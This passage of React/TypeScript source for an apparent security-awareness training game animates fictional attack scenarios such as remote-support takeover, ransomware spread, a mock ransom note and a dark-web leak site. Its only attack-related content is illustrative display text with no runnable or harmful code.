import { useEffect, useRef, useState } from "react";
import { audio } from "../lib/audio";
import { publicAsset } from "../lib/hostConfig";
import type { ConsequenceVisualKind } from "../scenario/types";

/**
 * Staged CSS/SVG dramatization played behind a Consequence beat's lines. It is
 * PURELY illustrative (no interaction) — the parent Consequence component
 * reveals narrated lines sequentially and passes the current line index as
 * `stage`, so the drawing advances in lockstep with the narration.
 *
 * "tailgate_breach" (Episode 1): a secured glass door swings open, a visitor
 * (a rim-lit hologram-style illustration — a real suited figure traced in a
 * glowing teal line, like a security-camera reconstruction, not a cartoon
 * stick figure) walks inside, raises a phone to photograph a whiteboard (a
 * real camera flash + shutter snap), then walks to an unattended workstation
 * and plugs a small device into it (a connect pulse + a soft insert click).
 * The visitor art is a single bundled illustration (`visitor.png`) reused at
 * every stage — only the group's position/stage overlays change — so it stays
 * visually consistent while it "walks" door -> board -> desk.
 */
export function ConsequenceVisual({
  kind,
  stage,
  hypothetical,
}: {
  kind: ConsequenceVisualKind;
  stage: number;
  /** see `Beat.consequence.hypothetical` — only a handful of visuals with
   *  first/second-person claims ("you clicked...") need to branch on it. */
  hypothetical?: boolean;
}) {
  if (kind === "badusb") return <BadUsbVisual stage={stage} />;
  if (kind === "hackerterminal") return <HackerTerminalVisual stage={stage} />;
  if (kind === "ransom_takeover") return <RansomTakeoverVisual stage={stage} />;
  if (kind === "ransomware_spread") return <RansomwareSpreadVisual stage={stage} />;
  if (kind === "leaksite") return <LeakSiteVisual stage={stage} />;
  if (kind === "ai_shared_leak") return <AiSharedLeakVisual stage={stage} />;
  if (kind === "desk_privacy") return <DeskPrivacyVisual stage={stage} />;
  if (kind === "domain_spoof") return <DomainSpoofVisual stage={stage} />;
  if (kind === "deepfake_call") return <DeepfakeCallVisual stage={stage} />;
  if (kind === "fake_meeting") return <FakeMeetingVisual stage={stage} />;
  if (kind === "remote_takeover") return <RemoteTakeoverVisual stage={stage} hypothetical={hypothetical} />;
  if (kind !== "tailgate_breach") return null;
  return <TailgateVisual stage={stage} />;
}

/**
 * "Desk & data privacy" helper graphic (terminal debrief, Episode 3 topic) —
 * a small top-down desk: a document glowing red as CONFIDENTIAL sits next to
 * an unlocked-screen glyph, then a hand stamp locks the screen and files the
 * document away, and the desk settles clean/green. Looping stage 0..2 (the
 * caller drives the loop via LoopingHelperVisual in TerminalHelperModal.tsx).
 */
function DeskPrivacyVisual({ stage }: { stage: number }) {
  const s = Math.min(Math.max(stage, 0), 2);
  return (
    <div className="cqv cqv--desk" data-stage={s} aria-hidden>
      <div className="dpv-scene">
        <div className="dpv-doc">
          <span className="dpv-doc-tag">{s < 2 ? "CONFIDENTIAL" : "FILED"}</span>
          <span className="dpv-doc-line" />
          <span className="dpv-doc-line" />
          <span className="dpv-doc-line dpv-doc-line--short" />
        </div>
        <div className="dpv-monitor">
          <span className="dpv-monitor-glow" />
          {s >= 1 ? (
            <svg viewBox="0 0 24 24" className="dpv-lock" fill="none" stroke="currentColor" strokeWidth="1.8">
              <rect x="5.5" y="11" width="13" height="9" rx="1.6" />
              <path d="M8 11V7.5a4 4 0 0 1 8 0V11" strokeLinecap="round" />
            </svg>
          ) : (
            <svg viewBox="0 0 24 24" className="dpv-lock dpv-lock--open" fill="none" stroke="currentColor" strokeWidth="1.8">
              <rect x="5.5" y="11" width="13" height="9" rx="1.6" />
              <path d="M8 11V7.5a4 4 0 0 1 7.6-1.4" strokeLinecap="round" />
            </svg>
          )}
        </div>
        <span className={`dpv-stamp ${s >= 2 ? "dpv-stamp--in" : ""}`}>SECURE</span>
      </div>
    </div>
  );
}

/**
 * "Phishing domain & bank-detail fraud" helper graphic (terminal debrief) — a
 * mock browser address bar types out a lookalike domain, then a
 * character-diff pass highlights exactly where it deviates from the real
 * company domain, then a red "not verified" stamp lands.
 */
function DomainSpoofVisual({ stage }: { stage: number }) {
  const s = Math.min(Math.max(stage, 0), 2);
  const real = "northbayfinancial.com";
  const fake = "northbay-id-secure.com";
  return (
    <div className="cqv cqv--domain" data-stage={s} aria-hidden>
      <div className="dsv-scene">
        <div className="dsv-bar">
          <span className="dsv-bar-lock">{"\u{1F512}"}</span>
          <span className="dsv-bar-url">
            {fake.split("").map((ch, i) => (
              <span key={i} className={s >= 1 && i >= 8 && i <= 9 ? "dsv-diff" : undefined}>
                {ch}
              </span>
            ))}
          </span>
        </div>
        <div className={`dsv-compare ${s >= 1 ? "dsv-compare--show" : ""}`}>
          <span className="dsv-compare-label">Real domain</span>
          <span className="dsv-compare-url">{real}</span>
        </div>
        <span className={`dsv-stamp ${s >= 2 ? "dsv-stamp--in" : ""}`}>NOT VERIFIED</span>
      </div>
    </div>
  );
}

/**
 * "Deepfake executive call" helper graphic (terminal debrief, Episode 9
 * topic) — a video-call tile of a face that periodically glitches into
 * scanline artifacts (an AI-generated face breaking down under
 * reconstruction), with a small "AI" chip and an "UNVERIFIED IDENTITY"
 * banner landing on the final stage.
 */
function DeepfakeCallVisual({ stage }: { stage: number }) {
  const s = Math.min(Math.max(stage, 0), 2);
  return (
    <div className="cqv cqv--deepfake" data-stage={s} aria-hidden>
      <div className="dfv-scene">
        <div className={`dfv-tile ${s >= 1 ? "dfv-tile--glitch" : ""}`}>
          <svg viewBox="0 0 24 24" className="dfv-face" fill="none" stroke="currentColor" strokeWidth="1.6">
            <circle cx="12" cy="9.2" r="4.2" />
            <path d="M4.5 20c0-4.1 3.4-7 7.5-7s7.5 2.9 7.5 7" strokeLinecap="round" />
          </svg>
          <span className="dfv-scan dfv-scan--1" />
          <span className="dfv-scan dfv-scan--2" />
          <span className="dfv-chip">AI</span>
        </div>
        <span className={`dfv-banner ${s >= 2 ? "dfv-banner--in" : ""}`}>UNVERIFIED IDENTITY</span>
      </div>
    </div>
  );
}

function FakeMeetingVisual({ stage }: { stage: number }) {
  const s = Math.min(Math.max(stage, 0), 5);
  const people = [
    { name: "Marc Weber", role: "CFO", mark: "AI FACE", extra: "cloned voice" },
    { name: "Sarah Lindner", role: "Corp Dev", mark: "AI FACE", extra: "cloned voice" },
    { name: "Julian Roth", role: "Legal", mark: "CAMERA OFF", extra: "cloned voice" },
    { name: "Daniel Kovacs", role: "Investor", mark: "FAKE PROFILE", extra: "no real person" },
  ];
  return (
    <div className="cqv cqv--fakemeet" data-stage={s} aria-hidden>
      <div className="fmv-wall">
        <i />
        <i />
        <i />
      </div>
      <div className="fmv-grid">
        {people.map((person, index) => (
          <article key={person.name} className={s > index ? "is-on" : ""}>
            <span className="fmv-face">{person.name.split(" ").map((w) => w[0]).join("")}</span>
            <b>{person.name}</b>
            <small>{person.role}</small>
            {s > index && (
              <em>
                {person.mark}
                <span>{person.extra}</span>
              </em>
            )}
          </article>
        ))}
      </div>
      <p className={`fmv-banner${s >= 5 ? " is-on" : ""}`}>Every participant on this call can be generated</p>
    </div>
  );
}

/**
 * "Remote-support trick" (Episode 13 vishing consequence) — a purpose-built
 * dramatization of exactly what the narration describes: a SECOND "remote"
 * cursor takes over the desktop, quietly installs a helper tool, opens the
 * confidential file, and drags it out, while the learner's own cursor sits
 * frozen. The 3 narration lines gate three MACRO phases (`s` 0..3, matching
 * how many lines have been spoken so far); each phase is NOT a single CSS
 * flip but its own short internally-timed sequence of micro-steps (same
 * "self-paced, independent of narration length" pattern as
 * TailgateVisual/RansomwareSpreadVisual — narration is TTS-driven and takes
 * several seconds per line, which is exactly enough time for the micro-steps
 * below to play out and then rest in their final pose):
 *   s 0->1 ("...caller had full control...seeing your screen and acting as
 *           you"): a quick recap of what just happened off-screen (the call,
 *           the click on the remote tool) fades out, "establishing session"
 *           connects, then the banner flips live and the ghost cursor fades
 *           in — the takeover itself.
 *   s 1->2 ("...opened a confidential file...copied it out, all while you
 *           watched"): the ghost cursor quietly installs a helper tool (a
 *           small terminal readout — this is the "hacker installs software"
 *           beat), then opens the Project Horizon file in a preview window,
 *           then drags it toward an outbound arrow — a live "copying out"
 *           trace.
 *   s 2->3 ("...no password was ever asked for..."): the file is gone from
 *           the desktop (sent), the install terminal closes, a red stamp
 *           lands.
 * REGRESSION FIX (2026-07-26): the card previously had no max-height/overflow
 * guard (every sibling cqv card does), so on shorter viewports its content
 * could run past the reserved narration-card band and get clipped by the
 * parent `.cqv`'s `overflow:hidden` — this is the concrete "cut off" bug.
 */
type RtkMicro = "recap" | "connecting" | "live" | "installing" | "opening" | "exfil" | "done";

function RemoteTakeoverVisual({ stage, hypothetical }: { stage: number; hypothetical?: boolean }) {
  const s = Math.min(Math.max(stage, 0), 3);
  const [micro, setMicro] = useState<RtkMicro>("recap");
  const fired = useRef<Set<number>>(new Set());

  useEffect(() => {
    if (fired.current.has(s)) return;
    fired.current.add(s);
    const timers: number[] = [];
    if (s === 1) {
      timers.push(window.setTimeout(() => setMicro("connecting"), 500));
      timers.push(
        window.setTimeout(() => {
          setMicro("live");
          audio.dataBlip();
        }, 1500)
      );
    }
    if (s === 2) {
      timers.push(
        window.setTimeout(() => {
          setMicro("installing");
          audio.typing(3);
        }, 300)
      );
      timers.push(window.setTimeout(() => setMicro("opening"), 1900));
      timers.push(
        window.setTimeout(() => {
          setMicro("exfil");
          audio.click();
        }, 2900)
      );
      timers.push(window.setTimeout(() => audio.dataBlip(), 3400));
    }
    if (s === 3) {
      setMicro("done");
      timers.push(window.setTimeout(() => audio.breachAlert(), 100));
    }
    return () => timers.forEach((t) => window.clearTimeout(t));
  }, [s]);

  const recapDone = micro !== "recap";
  const live = micro !== "recap" && micro !== "connecting";
  const installing = micro === "installing";
  const fileOpen = micro === "opening" || micro === "exfil" || micro === "done";
  const exfiltrating = micro === "exfil";
  const done = micro === "done";
  const ghostPos = fileOpen ? (exfiltrating || done ? "exit" : "file") : live ? "center" : "hidden";

  return (
    <div className="cqv cqv--remotetakeover" aria-hidden data-stage={s}>
      <div className="rtk-card">
        {/* Quick recap of the two off-screen moments that led here — the call,
            then the learner's own click — so this card reads as a continuous
            chain rather than starting mid-scene. Collapses away the instant
            the takeover itself begins. */}
        <div className={`rtk-recap ${recapDone ? "rtk-recap--done" : ""}`}>
          <div className="rtk-recap-step">
            <span className="rtk-recap-ico" aria-hidden>
              <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.8">
                <path d="M4.5 5.5c0 8 6 14 14 14l1.6-3.4a1.6 1.6 0 0 0-.9-2.1l-3-1.1a1.6 1.6 0 0 0-1.8.5l-.7.9a11 11 0 0 1-4.6-4.6l.9-.7a1.6 1.6 0 0 0 .5-1.8l-1.1-3a1.6 1.6 0 0 0-2.1-.9L4.5 5.5Z" />
              </svg>
            </span>
            <span className="rtk-recap-text">Alex Turner &middot; IT Security called</span>
          </div>
          <span className="rtk-recap-arrow" aria-hidden>{"\u2192"}</span>
          <div className={`rtk-recap-step rtk-recap-step--click ${micro === "recap" ? "rtk-recap-step--pulse" : ""}`}>
            <span className="rtk-recap-ico rtk-recap-ico--click" aria-hidden>
              <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.8">
                <path d="M9 4.5v11M4.5 9.5l4.5-1M13.5 8l6 2.6c1 .45 1 1.9-.05 2.28l-2.6.94a1.6 1.6 0 0 0-.98.98l-.9 2.5c-.4 1.1-1.9 1.1-2.3 0L9 8Z" />
              </svg>
            </span>
            <span className="rtk-recap-text">
              {hypothetical
                ? <>If you&apos;d clicked &ldquo;Open NorthBay Remote Assist&rdquo;&hellip;</>
                : <>You clicked &ldquo;Open NorthBay Remote Assist&rdquo;</>}
            </span>
          </div>
        </div>

        <div className={`rtk-banner ${live ? "rtk-banner--live" : ""}`}>
          <span className="rtk-banner-ico" aria-hidden>
            <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.7">
              <rect x="3" y="4.5" width="18" height="12" rx="1.6" />
              <path d="M8 20h8M12 16.5V20" strokeLinecap="round" />
            </svg>
          </span>
          <div className="rtk-banner-text">
            <strong>{live ? "Remote session active" : "Remote-support session requested"}</strong>
            <span>
              {live
                ? hypothetical
                  ? "Alex Turner would now be viewing and controlling this screen — every click theirs, not yours."
                  : "Alex Turner is viewing and controlling this screen — every click is theirs now."
                : "Establishing remote session\u2026"}
            </span>
          </div>
        </div>

        <div className="rtk-desktop">
          <div className="rtk-taskbar">
            <span className="rtk-start" />
            <span className="rtk-clock">17:42</span>
          </div>

          {/* the real desktop: a couple of ordinary icons + the confidential file */}
          <div className="rtk-icons">
            <span className="rtk-icon">
              <span className="rtk-icon-glyph">{"\uD83D\uDCC1"}</span>
              Reports
            </span>
            <span className="rtk-icon">
              <span className="rtk-icon-glyph">{"\uD83D\uDCC4"}</span>
              Notes.txt
            </span>
            <span className={`rtk-icon rtk-icon--target ${done ? "rtk-icon--gone" : ""} ${fileOpen ? "rtk-icon--sel" : ""}`}>
              <span className="rtk-icon-glyph">{"\uD83D\uDCCB"}</span>
              Project_Horizon.pptx
            </span>
          </div>

          {/* the confidential file, opened in a small preview once the ghost
              cursor reaches it — makes "opened a confidential file" literal
              instead of just narrated. */}
          {fileOpen && (
            <div className={`rtk-filewin ${done ? "rtk-filewin--closing" : ""}`}>
              <div className="rtk-filewin-bar">
                <span>Project_Horizon.pptx</span>
                <span className="rtk-filewin-x">{"\u00D7"}</span>
              </div>
              <div className="rtk-filewin-body">
                <span className="rtk-filewin-h">CONFIDENTIAL — Project Horizon</span>
                <span className="rtk-filewin-l" />
                <span className="rtk-filewin-l" />
                <span className="rtk-filewin-l rtk-filewin-l--short" />
              </div>
            </div>
          )}

          {/* the ghost's own install terminal — the literal "installs
              software" beat: a tiny mock shell typing out a persistence
              install, then clearing once the file work starts. */}
          {installing && (
            <div className="rtk-install">
              <div className="rtk-install-bar">
                <span className="rtk-install-dot" />
                <span className="rtk-install-dot" />
                <span className="rtk-install-dot" />
                <em>remote-agent.exe</em>
              </div>
              <p className="rtk-install-line">
                <span className="rtk-install-prompt">{">"}</span> install --silent helper-agent.pkg
              </p>
              <p className="rtk-install-line rtk-install-line--done">
                <span className="rtk-install-prompt">{">"}</span> persistence task created
              </p>
            </div>
          )}

          {/* the learner's OWN cursor — frozen once the takeover starts, making
              the "acting as you" point visually literal. */}
          <span className={`rtk-cursor rtk-cursor--you ${live ? "rtk-cursor--frozen" : ""}`} aria-hidden>
            <svg viewBox="0 0 20 20" fill="currentColor">
              <path d="M2 1.5 17 8.6l-6 1.4-2.7 5.7Z" />
            </svg>
            <span className="rtk-cursor-tag">You</span>
          </span>

          {/* the attacker's ghost cursor — fades in once the session goes
              live, drifts to the file, then to the exit. */}
          {ghostPos !== "hidden" && (
            <span className={`rtk-cursor rtk-cursor--ghost rtk-cursor--pos-${ghostPos}`} aria-hidden>
              <svg viewBox="0 0 20 20" fill="currentColor">
                <path d="M2 1.5 17 8.6l-6 1.4-2.7 5.7Z" />
              </svg>
              <span className="rtk-cursor-tag rtk-cursor-tag--ghost">Alex (remote)</span>
            </span>
          )}

          {/* the exfil trail: file drags toward this outbound arrow once the
              ghost reaches the exit, is gone from the desktop once done. */}
          <div className={`rtk-exit ${exfiltrating || done ? "rtk-exit--active" : ""}`} aria-hidden>
            <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.8">
              <path d="M4 12h13M12 5l7 7-7 7" strokeLinecap="round" strokeLinejoin="round" />
            </svg>
            <span className="rtk-exit-label">{done ? "copied out" : "copying\u2026"}</span>
          </div>
        </div>

        <span className={`rtk-stamp ${done ? "rtk-stamp--in" : ""}`}>NO PASSWORD NEEDED</span>
      </div>
    </div>
  );
}

/**
 * "Someone else opened that chat" — the shared-login consequence for Episode 6.
 * A mock ChatGPT window as a DIFFERENT employee sees it after signing in with
 * the same shared department login: the learner's NorthBay contract chat is
 * sitting in the sidebar history, and at the last stage the colleague opens it
 * and reads the summary + the attached file. NOT a security camera — it's a
 * co-worker's screen, so it's rendered plainly (cctv:false in the beat).
 *   stage 0 = the colleague's own fresh chat, calm.
 *   stage 1 = the shared "signed in as ai-team@..." badge is visible.
 *   stage 2 = the NorthBay contract chat lights up in the sidebar history.
 *   stage 3 = they open it — the summary + attached file are on screen, being read.
 */
function AiSharedLeakVisual({ stage }: { stage: number }) {
  const s = Math.min(Math.max(stage, 0), 3);
  const opened = s >= 3;
  const history = [
    { id: "h_nb", title: "NorthBay contract summary", hot: true },
    { id: "h1", title: "Draft supplier email", hot: false },
    { id: "h2", title: "Explain pension options", hot: false },
    { id: "h3", title: "Team offsite ideas", hot: false },
  ];
  return (
    <div className="cqv cqv--aishare" data-stage={s} aria-hidden>
      <div className="as-card">
        <div className="as-banner">
          <span className="as-banner-ico">{"\u26A0"}</span>
          <div className="as-banner-text">
            <strong>One login, one shared history.</strong>
            <span>Anyone who signs in with the shared account sees every chat left in it.</span>
          </div>
        </div>
        <div className="as-window">
          <aside className="as-side">
            <div className="as-newchat">
              <span aria-hidden>{"\uFF0B"}</span> New chat
            </div>
            <div className="as-side-label">Recent</div>
            {history.map((h) => (
              <div
                key={h.id}
                className={`as-side-item ${h.hot && s >= 2 ? "hot" : ""} ${h.hot && opened ? "open" : ""}`}
              >
                {h.title}
              </div>
            ))}
            <div className={`as-acct ${s >= 1 ? "show" : ""}`}>
              <span className="as-acct-avatar">AI</span>
              <span className="as-acct-meta">
                <strong>ai-team@northbayfinancial.com</strong>
                <em>Shared department login</em>
              </span>
            </div>
          </aside>
          <section className="as-main">
            {!opened ? (
              <div className="as-empty">
                <span className="as-empty-glyph">{"\u2726"}</span>
                <p>
                  {s >= 2
                    ? "That NorthBay chat is right there in the list\u2026"
                    : "A colleague opens the shared account to draft an email."}
                </p>
              </div>
            ) : (
              <div className="as-thread">
                <div className="as-turn as-turn--user">
                  {"Summarise the NorthBay contract for the steering committee\u2026"}
                  <span className="as-turn-file">{"\uD83D\uDCC4"} NorthBay_Contract_Original.pdf</span>
                </div>
                <div className="as-turn as-turn--ai">
                  <span className="as-turn-badge">{"\u2726"}</span>
                  {"Key obligations, exit conditions and financial exposure (CHF 4.2M)\u2026"}
                </div>
                <div className="as-eyes">
                  <span className="as-eyes-ico">{"\uD83D\uDC40"}</span> Being read by someone who was never on this
                  deal
                </div>
              </div>
            )}
          </section>
        </div>
      </div>
    </div>
  );
}

/**
 * "It just hit us" ransomware takeover on the learner's OWN workstation — the
 * visceral shock that opens the incident. NOT technical; the whole point is the
 * gut-punch of watching your own files lock. Staged:
 *   stage 0 = the normal desktop, calm.
 *   stage 1 = the screen FLICKERS/glitches; a cascade of "file encrypted" toasts.
 *   stage 2 = a full-screen red ransom note slides over everything (skull,
 *             "ALL YOUR FILES HAVE BEEN ENCRYPTED", a fake wallet + countdown).
 *   stage 3 = the note locks in; network drives flagged encrypted; alarm bed.
 * No interactive pay affordance here on purpose — the "pay the ransom" trap is
 * the incident-response decision that follows.
 */
function RansomTakeoverVisual({ stage }: { stage: number }) {
  const s = Math.min(Math.max(stage, 0), 3);
  const fired = useRef<Set<number>>(new Set());

  const LOCKING = [
    "Q3_forecast.xlsx",
    "client_contracts.pdf",
    "project_horizon_M&A.docx",
    "payroll_2026.xlsx",
    "board_minutes.pdf",
  ];

  useEffect(() => {
    if (fired.current.has(s)) return;
    fired.current.add(s);
    const timers: number[] = [];
    if (s === 1) {
      audio.errorBuzz();
      [140, 340, 560, 800].forEach((dt) => timers.push(window.setTimeout(() => audio.dataBlip(), dt)));
    }
    if (s === 2) audio.startRansomAlarm();
    if (s === 3) audio.breachAlert();
    return () => timers.forEach((t) => window.clearTimeout(t));
  }, [s]);

  // Kill the alarm when the takeover cinematic unmounts.
  useEffect(() => () => audio.stopRansomAlarm(), []);

  return (
    <div className="cqv cqv--takeover" aria-hidden data-stage={s}>
      {/* the workstation, flickering as it's overrun */}
      <div className={`rt-desktop ${s >= 1 ? "glitch" : ""}`}>
        <div className="rt-taskbar">
          <span className="rt-start" />
          <span className="rt-clock">17:04</span>
        </div>
        {s >= 1 && (
          <div className="rt-toasts">
            {LOCKING.map((f, i) => (
              <div key={f} className="rt-toast" style={{ animationDelay: `${i * 0.14}s` }}>
                <span className="rt-toast-ico">{"\uD83D\uDD12"}</span>
                <span className="rt-toast-name">{f}</span>
                <span className="rt-toast-tag">encrypted</span>
              </div>
            ))}
          </div>
        )}
      </div>

      {/* the ransom note takeover */}
      {s >= 2 && (
        <div className="rt-note">
          <div className="rt-skull">{"\u2620"}</div>
          <div className="rt-note-title">ALL YOUR FILES HAVE BEEN ENCRYPTED</div>
          <div className="rt-note-body">
            Every document, spreadsheet and shared drive on this network has been locked with military-grade
            encryption. There is no way to recover them without our private key.
          </div>
          <div className="rt-note-grid">
            <div className="rt-note-cell">
              <span className="rt-note-k">Send exactly</span>
              <span className="rt-note-v">45 BTC</span>
            </div>
            <div className="rt-note-cell">
              <span className="rt-note-k">To wallet</span>
              <span className="rt-note-v mono">bc1q9x&hellip;7f4k2</span>
            </div>
          </div>
          <div className={`rt-countdown ${s >= 3 ? "live" : ""}`}>
            <span className="rt-countdown-label">Time left before your files are deleted</span>
            <span className="rt-countdown-clock">71:59:47</span>
          </div>
          {s >= 3 && (
            <div className="rt-drives">
              <span className="rt-drives-dot" /> Network drives (H:, S:, Finance) — ENCRYPTED
            </div>
          )}
        </div>
      )}
    </div>
  );
}

/**
 * "One click, every machine" ransomware-spread dramatization. NOT technical —
 * the message is simply: a single careless click anywhere in the building can
 * take down the WHOLE company. Staged network illustration:
 *   stage 0 = pre-roll: a calm grid of workstations + a central server, all green.
 *   stage 1 = ONE workstation clicks a bad link -> flashes red ("malware loaded").
 *   stage 2 = the infection spreads along the network links to every other
 *             machine + the server ("exploiting internal services").
 *   stage 3 = every machine is locked (red padlocks) -> a ransom banner takes
 *             over. A heavy alarm bed runs through stages 2-3.
 * Timings are SFX-only and independent of narration length (TTS-driven), same
 * pattern as the other visuals here.
 */
/**
 * Kill-chain dramatization for the ransomware origin story: fake game site ->
 * malware lands on the personal laptop -> the still-open VPN tunnel lets it
 * discover the company's file shares -> it encrypts everything it can reach
 * AND quietly exfiltrates a copy. Each of the 4 narration lines advances the
 * chain by exactly one station, so the animation and the voiceover always
 * land in lockstep (see Consequence.tsx: `stage` = lines already spoken).
 */
function RansomwareSpreadVisual({ stage }: { stage: number }) {
  const s = Math.min(Math.max(stage, 0), 3);
  const fired = useRef<Set<number>>(new Set());

  // Self-managed ONE-BY-ONE reveal, decoupled from how quickly the parent
  // narration advances `stage`: rather than a node and its connector both
  // flipping "on" the instant `s` reaches them (which read as "everything
  // lights up at once" per 2026-07-26 feedback), each pending stage first
  // shows a brief travelling pulse ALONG the connector, and only once that
  // pulse arrives does the destination node pop in. If `stage` jumps by more
  // than one step at a time, this chains through the intermediate steps
  // instead of skipping straight to the end, so the "fake site -> download ->
  // laptop -> VPN -> network -> encrypt" chain always reads in order.
  const [revealed, setRevealed] = useState(0);
  const [transit, setTransit] = useState<number | null>(null);
  useEffect(() => {
    if (s <= revealed) return;
    const next = revealed + 1;
    setTransit(next);
    const t = window.setTimeout(() => {
      setTransit(null);
      setRevealed(next);
    }, 620);
    return () => window.clearTimeout(t);
  }, [s, revealed]);

  useEffect(() => {
    if (fired.current.has(s)) return;
    fired.current.add(s);
    const timers: number[] = [];
    if (s === 1) {
      audio.errorBuzz();
      timers.push(window.setTimeout(() => audio.dataBlip(), 140));
    }
    if (s === 2) {
      audio.startRansomAlarm();
      [0, 200, 400, 620, 840].forEach((dt) => timers.push(window.setTimeout(() => audio.dataBlip(), dt)));
    }
    if (s === 3) {
      audio.breachAlert();
      [0, 180, 360, 540].forEach((dt) => timers.push(window.setTimeout(() => audio.dataBlip(), dt)));
    }
    return () => timers.forEach((t) => window.clearTimeout(t));
  }, [s]);

  // Kill the alarm when the whole cinematic unmounts.
  useEffect(() => () => audio.stopRansomAlarm(), []);

  const CAPTIONS = [
    "A search result promises a free copy of a popular browser game.",
    "The \u201Cgame launcher\u201D installs quietly in the background \u2014 no game ever opens.",
    "Using the VPN tunnel already open, the malware scans for Windows file servers and shared drives.",
    "It encrypts every file it can reach \u2014 and quietly copies a full set out first.",
  ];

  return (
    <div className="cqv cqv--rwspread" aria-hidden data-stage={s}>
      <div className="rw-card">
        <div className="rw-banner">
          <span className="rw-banner-ico">{"\u26A0"}</span>
          <div className="rw-banner-text">
            <strong>One click. Every machine.</strong>
            <span>{CAPTIONS[s]}</span>
          </div>
        </div>

        <div className="rwk-track">
          <div className="rwk-stage rwk-stage--site on">
            <div className="rwk-ring rwk-ring--site">
              <span className="rwk-ico">{"\uD83C\uDFAE"}</span>
            </div>
            <div className="rwk-label">Fake game site</div>
            <div className="rwk-sub">retro-invaders-free.io</div>
          </div>

          <div className={`rwk-conn ${transit === 1 ? "transit" : ""} ${revealed >= 1 ? "flow" : ""}`}>
            <span className="rwk-conn-pulse" aria-hidden />
            <span className="rwk-chev">{"\u203A\u203A\u203A"}</span>
            <span className="rwk-conn-label">download</span>
          </div>

          <div className={`rwk-stage rwk-stage--laptop ${revealed >= 1 ? "on hit" : ""}`}>
            <div className="rwk-ring rwk-ring--laptop">
              <span className="rwk-ico">{"\uD83D\uDCBB"}</span>
            </div>
            <div className="rwk-label">Your laptop</div>
            {revealed >= 1 && <div className="rwk-tag bad">Malware installed</div>}
          </div>

          <div className={`rwk-conn ${transit === 2 ? "transit" : ""} ${revealed >= 2 ? "flow" : ""}`}>
            <span className="rwk-conn-pulse" aria-hidden />
            <span className="rwk-chev">{"\u203A\u203A\u203A"}</span>
            <span className="rwk-conn-label">via VPN</span>
          </div>

          <div className={`rwk-stage rwk-stage--net ${revealed >= 2 ? "on hit" : ""}`}>
            <div className="rwk-ring rwk-ring--net">
              {revealed >= 2 && (
                <>
                  <span className="rwk-radar" />
                  <span className="rwk-radar rwk-radar--2" />
                </>
              )}
              <span className="rwk-ico">{"\uD83D\uDDA7"}</span>
            </div>
            <div className="rwk-label">Company network</div>
            {revealed >= 2 && <div className="rwk-tag bad">Shares discovered</div>}
          </div>

          <div className={`rwk-conn ${transit === 3 ? "transit" : ""} ${revealed >= 3 ? "flow" : ""}`}>
            <span className="rwk-conn-pulse" aria-hidden />
            <span className="rwk-chev">{"\u203A\u203A\u203A"}</span>
          </div>

          <div className={`rwk-stage rwk-stage--servers ${revealed >= 3 ? "on hit locked" : ""}`}>
            <div className="rwk-ring rwk-ring--servers">
              <span className="rwk-ico">{"\uD83D\uDDC4"}</span>
              {revealed >= 3 && (
                <span className="rwk-lockbadge" aria-hidden>
                  {"\uD83D\uDD12"}
                </span>
              )}
            </div>
            <div className="rwk-label">File servers</div>
            {revealed >= 3 && <div className="rwk-tag bad">Encrypted</div>}
          </div>
        </div>

        {revealed >= 3 && (
          <div className="rwk-exfil">
            <span className="rwk-exfil-file">{"\uD83D\uDCC4"}</span>
            <span className="rwk-exfil-arrow" aria-hidden>
              {"\u2192"}
            </span>
            <span className="rwk-exfil-target">{"\u2620"}</span>
            <span className="rwk-exfil-label">A full copy is exfiltrated to the attacker</span>
          </div>
        )}

        {revealed >= 3 && (
          <div className="rw-takeover">
            <span className="rw-takeover-dot" /> ALL SYSTEMS ENCRYPTED — network locked
          </div>
        )}
      </div>
    </div>
  );
}

/**
 * Dark-web leak-site dramatization: the double-extortion pay-off, redesigned
 * as an actual "wall of shame" (the term ransomware gangs use for these
 * blogs) rather than a single isolated victim card, so it reads clearly as
 * a real extortion site with a roster of past/current victims — and closes
 * with a short "how this business works" explainer.
 *   stage 0 = pre-roll: the wall + a couple of OTHER (already-listed) victims.
 *   stage 1 = NorthBay's own row lands on the wall, tagged "NEW".
 *   stage 2 = sample stolen files are published as proof.
 *   stage 3 = the ransom demand + countdown lights up.
 *   stage 4 = the "how this business works" explainer panel appears.
 */
function LeakSiteVisual({ stage }: { stage: number }) {
  const s = Math.min(Math.max(stage, 0), 4);
  const fired = useRef<Set<number>>(new Set());

  const OTHER_VICTIMS: { name: string; sub: string; status: string; paid?: boolean }[] = [
    { name: "Redline Manufacturing", sub: "industrial \u00B7 900 GB exfiltrated", status: "PAID \u2014 REMOVED", paid: true },
    { name: "Meridian Logistics AG", sub: "logistics \u00B7 1.4 TB exfiltrated", status: "LISTED" },
    { name: "Coastal Health Group", sub: "healthcare \u00B7 640 GB exfiltrated", status: "COUNTDOWN: 08:12" },
  ];

  const FILES = ["customer_database.sql", "project_horizon_M&A.zip", "payroll_2026.xlsx", "board_minutes.pdf"];

  useEffect(() => {
    if (fired.current.has(s)) return;
    fired.current.add(s);
    const timers: number[] = [];
    if (s === 1) audio.dataBlip();
    if (s === 2) [0, 240, 480, 720].forEach((dt) => timers.push(window.setTimeout(() => audio.dataBlip(), dt)));
    if (s === 3) audio.breachAlert();
    return () => timers.forEach((t) => window.clearTimeout(t));
  }, [s]);

  return (
    <div className="cqv cqv--leaksite" aria-hidden data-stage={s}>
      <div className="ls-monitor">
        <div className="ls-card">
          <div className="ls-bar">
            <span className="cgpt-dot cgpt-dot--r" />
            <span className="cgpt-dot cgpt-dot--y" />
            <span className="cgpt-dot cgpt-dot--g" />
            <div className="ls-omni">
              <span className="ls-onion">{"\u26D3"}</span>
              <span className="ls-url">http://l3akbl0g&hellip;.onion/victims</span>
              <span className="ls-tor">TOR HIDDEN SERVICE</span>
            </div>
          </div>
          <div className="ls-body">
          <div className="ls-brand">
            <span className="ls-skull">{"\u2620"}</span>
            <div className="ls-brand-text">
              <span className="ls-brand-name">BLACKVAULT — LEAKS</span>
              <span className="ls-brand-tag">
                the "wall of shame" — victims who haven&apos;t paid, published to pressure them into it
              </span>
            </div>
          </div>

          <div className="ls-wall">
            {OTHER_VICTIMS.map((v) => (
              <div key={v.name} className={`ls-row ${v.paid ? "paid" : ""}`}>
                <span className="ls-row-name">{v.name}</span>
                <span className="ls-row-sub">{v.sub}</span>
